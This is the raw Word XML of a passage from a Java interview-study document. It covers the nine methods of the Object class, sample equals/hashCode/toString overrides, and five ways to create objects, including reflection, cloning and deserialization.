    <w:p w14:paraId="0E3F9315" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005E76D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5038F55">
          <v:rect id="_x0000_i1298" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA38FD" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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mmon 9 Methods of Object Cla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0"/>
        <w:gridCol w:w="8394"/>
      </w:tblGrid>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="5114D0DD" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156909C5" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A88575" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">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5E76DA" w:rsidRPr="00CE4B95" w14:paraId="0AF3561A" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="269D95C3" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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1. equals(Object obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06872DC3" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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ares two objects for equality. Default compares references, can be overridden for content equality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="6B9E0B99" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="343AE921" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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2. hashCode()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="530E6DFB" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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s a hash code value for the object. Used in hashing collections like HashMap, HashSet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="27269FA0" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="292FEF7C" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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3. toString()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F03281D" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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s a string representation of the object. Default: ClassName@HashCode. Commonly overridden.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="5F3E0716" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FC694B8" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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4. getClass()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50441748" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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s the runtime class of the object (Class object).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="25F9447B" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69A2C057" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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5. clone()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23B9B248" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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reates and returns a </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>copy</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (clone) of the object. Requires Cloneable interface and overridden clone() method.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="734C2FD4" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66C4F1BB" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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6. finalize()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C7A84FA" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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alled by the Garbage Collector </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>before object destruction</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>. Rarely used. Deprecated in Java 9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="1ABA8289" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CD3BD05" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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7. wait()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72073CF5" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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uses the current thread to wait until another thread invokes notify() or notifyAll().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="71E03597" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002E7B3E" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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8. notify()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="123AB937" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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akes up a single thread that's waiting on the object's monitor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="0F811538" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4174DC6B" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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9. notifyAll()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B38DCF2" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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akes up </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> threads waiting on the object's monitor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6617CEFF" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005E76D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49E8CB7">
          <v:rect id="_x0000_i1299" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6CFBAE" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D0A15" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501882F9" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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equals</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Objec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7655EE6" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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thi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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F69297" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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obj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getClas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Clas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1C62A06C" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> oth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MyClas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p>
    <w:p w14:paraId="0EB1027D" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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oth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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B9322E" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C6CE19" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DD888C" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC392E" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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hashCod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9BA56C7" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Objec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has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6C9FEB8E" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1C8991" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D65791" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA31FD" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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to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78C885C" w14:textId="77777777" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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MyClass{i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nam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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A819FDF" w14:textId="661E35CB" w:rsidR="005E76DA" w:rsidRPr="00CE4B95"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0FA2B264" w14:textId="6B6D792B" w:rsidR="00B729A5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B729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177E82D2">
          <v:rect id="_x0000_i1300" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404D65C" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc196307590"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How many ways can we create objects of class in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="42D2B0EB" w14:textId="5F53583F" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EEA">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there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 main ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create an object of a class. Here's a breakdown with examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA05C8" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE7E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71407E5">
          <v:rect id="_x0000_i1301" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C9E66" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EE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1. Using new keyword (most common)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5999A" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj = new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F128E2C" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE7E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67FD81F">
          <v:rect id="_x0000_i1302" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E51709" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EE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2. Using Class.forName() and newInstance() (Reflection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B18113" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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in frameworks like Hibernate, JDBC drivers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B17059" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj = (MyClass) Class.forName("MyClass").newInstance(); // Deprecated in Java 9+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162FD3E3" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EEA">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Better alternative in Java 9+:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E06A5E" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj = MyClass.class.getDeclaredConstructor().newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D7181" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE7E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19307E4">
          <v:rect id="_x0000_i1303" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D81977" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EE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3. Using clone() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755952A" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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Used to create a copy of an existing object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948492B" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj1 = new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152BF075" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj2 = (MyClass) obj1.clone(); // Requires `Cloneable` interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B47951" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE7E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0A25527">
          <v:rect id="_x0000_i1304" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="139EF6D7" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EE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4. Using Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470447C" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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bject is created by reading from a byte stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72003398" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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bjectInputStream in = new ObjectInputStream(new FileInputStream("file.ser"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8334D" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj = (MyClass) in.readObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7764C5CB" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE7E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EA969CC">
          <v:rect id="_x0000_i1305" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7004FF1E" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EE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5. Using Factory Methods or Builders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC2434" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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mon in design patterns. Especially useful when object creation is complex.</w:t>
      </w:r>
    </w:p>
